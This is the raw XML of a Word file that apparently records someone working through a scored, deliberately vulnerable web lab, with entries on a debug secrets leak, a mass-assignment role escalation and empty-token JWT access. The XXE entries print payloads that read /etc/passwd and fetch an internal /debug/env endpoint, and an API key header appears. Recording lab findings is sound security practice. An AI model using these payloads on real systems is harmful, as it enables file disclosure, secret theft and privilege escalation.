              <w:t xml:space="preserve">Accept-Encoding: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>gzip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, deflate, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="47C122B9" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628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  <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>X-API-Key: sk_jsmith_x7y8z9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="575DF390" w14:textId="77777777" w:rsidR="00FA628B" w:rsidRPr="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628B">
            <w:pPr>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FE927D1" w14:textId="4A55CBC8" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00FA628B">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="00FA628B">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>{"role":"admin","salary":999999}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D6F23BB" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6"/>
    <w:p w14:paraId="343AAA36" w14:textId="3BBAA47C" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA628B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B7BD2B4" wp14:editId="6BD84A40">
            <wp:extent cx="5943600" cy="20516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03F0" w14:textId="116A8C28" w:rsidR="00085602" w:rsidRPr="00085602" w:rsidRDefault="00085602" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085602">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Doesn’t work</w:t>
      </w:r>
      <w:r w:rsidRPr="00085602">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, the values for the role and salary for the user 2 do not change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F919B" w14:textId="01D1AE32" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6"/>
    <w:p w14:paraId="5A85280E" w14:textId="11E38348" w:rsidR="00FA628B" w:rsidRDefault="00085602" w:rsidP="006850F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76048656" wp14:editId="385A11C7">
            <wp:extent cx="5943600" cy="21355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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00085602" w14:paraId="5F60CD36" w14:textId="77777777" w:rsidTr="00BB77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3582E" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="00BB77BB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V21 — Debug Parameter — Secrets Leak on Any JSON Endpoint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AC95B" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="00BB77BB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TIER 3 — HARD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B906F" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="00BB77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8 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60300F29" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6"/>
    <w:p w14:paraId="619B9C63" w14:textId="29CB7056" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="7CA15C12" w14:textId="55560DA8" w:rsidR="00FA628B" w:rsidRDefault="00FA628B" w:rsidP="006850F6"/>
    <w:p w14:paraId="6156CE41" w14:textId="76E70DBC" w:rsidR="00FA628B" w:rsidRDefault="00085602" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04CD2C73" wp14:editId="7CA293DE">
            <wp:extent cx="5943600" cy="26219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E7C0" w14:textId="1B019544" w:rsidR="00085602" w:rsidRPr="00085602" w:rsidRDefault="00085602" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085602">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>It doesn’t show information related to that specific JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C8160A" w14:textId="77777777" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6"/>
    <w:p w14:paraId="68299CF9" w14:textId="27DF53A9" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E9D0653" wp14:editId="02F90FC9">
            <wp:extent cx="5943600" cy="2600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325E" w14:textId="57BCDDBB" w:rsidR="00085602" w:rsidRPr="00085602" w:rsidRDefault="00085602" w:rsidP="00085602">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00085602">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Token value doesn’t even matter, you can just access the same info with an empty value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393209C" w14:textId="3E56B3B3" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6"/>
    <w:p w14:paraId="1F38A841" w14:textId="0145432B" w:rsidR="00085602" w:rsidRDefault="00085602" w:rsidP="006850F6"/>
    <w:p w14:paraId="4AF5BD09" w14:textId="5061D48A" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5E6A" w14:paraId="4C4BC53F" w14:textId="77777777" w:rsidTr="00BB77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743E6" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="00BB77BB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V22 — Mass Assignment via Profile Form — Role Escalation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4C3AB" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="00BB77BB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TIER 3 — HARD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34D5D" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="00BB77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5 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54239CE8" w14:textId="11DAE146" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="717A053C" w14:textId="0AFA82C8" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Desene</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> animate, delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4777DE1D" w14:textId="5C90E5DC" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="3DCF1545" w14:textId="4C6FC491" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="76D4D9F8" w14:textId="5EBB037E" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="4781D11D" w14:textId="5A40254B" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="69E38D54" w14:textId="59B1BC9C" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="129D987F" w14:textId="42F00239" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="0C92267E" w14:textId="5DDB64D2" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="44B7BD35" w14:textId="57E269D4" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="2402C01C" w14:textId="1890C0B3" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="043D544B" w14:textId="3FD77CBD" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="48D9410A" w14:textId="51A1096E" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="29F390E9" w14:textId="000B0D38" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="4306D743" w14:textId="787D0ED6" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="70AF2BFD" w14:textId="0B3779AE" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="6A43C9EC" w14:textId="45A6480A" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="1726714A" w14:textId="38D4EC90" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="5B84317E" w14:textId="796B9F2A" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="30C5F9C8" w14:textId="360C3A4F" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="0E25BB93" w14:textId="5899A5D5" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="197BB565" w14:textId="39EAB570" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="7C3F6A0B" w14:textId="27D41877" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="0EBB5970" w14:textId="4462C6C0" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="1C6F7BE9" w14:textId="7BF14A0B" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="72B2953C" w14:textId="481407C5" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="437AFCD7" w14:textId="77777777" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E35A21" w14:paraId="0FD2E7F6" w14:textId="77777777" w:rsidTr="00BB77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63105" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="00BB77BB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V29 — XXE — Local File Read via XML Upload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335E0" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="00BB77BB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TIER 3 — HARD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6C0E5" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="00BB77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8 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6632BFE0" w14:textId="291988E2" w:rsidR="005A5E6A" w:rsidRDefault="005A5E6A" w:rsidP="006850F6"/>
    <w:p w14:paraId="17FBFFA2" w14:textId="01EA2B1B" w:rsidR="005A5E6A" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:r w:rsidRPr="00E35A21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE83307" wp14:editId="36A8B9BC">
            <wp:extent cx="5943600" cy="33096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5B11" w14:textId="2678890C" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="792E69D9" w14:textId="6A767A2B" w:rsidR="00E35A21" w:rsidRPr="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E35A21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E39BA15" w14:textId="6C732C5C" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:r w:rsidRPr="00E35A21">
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="UTF-8"?&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E35A21">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE root [   &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E35A21">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E35A21">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E35A21">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E35A21">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E35A21">
        <w:t xml:space="preserve"> &lt;profile&gt;   &lt;name&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E35A21">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E35A21">
        <w:t>;&lt;/name&gt;   &lt;dept&gt;HR&lt;/dept&gt; &lt;/profile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E01C6E4" w14:textId="1979B4FE" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:r w:rsidRPr="00E35A21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E893E0" wp14:editId="10CD13AD">
            <wp:extent cx="5943600" cy="27971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3994" w14:textId="7063FE6B" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:r w:rsidRPr="00E35A21">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5716C0D9" wp14:editId="3076452F">
            <wp:extent cx="5943600" cy="4635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54B1" w14:textId="7C613B49" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="392C6651" w14:textId="775E0292" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="6C959060" w14:textId="40D09E19" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="1E4DFC3A" w14:textId="30D1FA10" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="02730C1C" w14:textId="12A44EEA" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="44741817" w14:textId="34CCF3DC" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="35B42008" w14:textId="5A3D95F7" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="07AF1461" w14:textId="62AD7313" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="332495B1" w14:textId="1D8F6F76" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="22B3B246" w14:textId="62CAE7F1" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="1D30F174" w14:textId="79ABAE01" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="4A3F456A" w14:textId="7856C075" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E35A21" w14:paraId="1AE65179" w14:textId="77777777" w:rsidTr="00BB77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50D42" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="00BB77BB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V30 — XXE + SSRF — Internal HTTP via XML Entity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A5387" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="00BB77BB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TIER 3 — HARD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31E83" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="00BB77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8 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33223740" w14:textId="10D0462F" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="21212788" w14:textId="081A6655" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>poc_ssrf1.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D47403" w14:textId="61D1FB11" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:r w:rsidRPr="00E35A21">
        <w:t>&lt;!DOCTYPE r [&lt;!ENTITY x SYSTEM "http://127.0.0.1:5000/debug/env"&gt;]&gt; &lt;profile&gt;&lt;name&gt;&amp;x;&lt;/name&gt;&lt;/profile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B69687C" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="11E718E6" w14:textId="558EE624" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6">
      <w:r w:rsidRPr="00E35A21">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="661FE737" wp14:editId="7D247211">
            <wp:extent cx="5943600" cy="29686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D3C0" w14:textId="1C951C7B" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="1F726936" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:p w14:paraId="3567A334" w14:textId="77777777" w:rsidR="00E35A21" w:rsidRDefault="00E35A21" w:rsidP="006850F6"/>
    <w:sectPr w:rsidR="00E35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E567D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A5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11297"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA50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C1804"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9765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10E75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="910A9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AC"/>
    <w:rsid w:val="00085602"/>
    <w:rsid w:val="000E1A3E"/>
    <w:rsid w:val="00511252"/>
    <w:rsid w:val="00520596"/>
    <w:rsid w:val="00582106"/>
    <w:rsid w:val="005A5E6A"/>
    <w:rsid w:val="005F1C57"/>
    <w:rsid w:val="006550AC"/>
    <w:rsid w:val="006850F6"/>
    <w:rsid w:val="007337F0"/>
    <w:rsid w:val="00BE6C4F"/>
    <w:rsid w:val="00C9054C"/>
    <w:rsid w:val="00E35A21"/>
    <w:rsid w:val="00ED669D"/>
    <w:rsid w:val="00FA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0E9F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{82A5C3F6-7BF8-49DF-A5F8-F9B435F9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69D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005F1C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0AC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00655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55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0A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F1C5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05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17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a.alex.arvinte@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>a.alex.arvinte@gmail.com</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-06T11:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T13:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>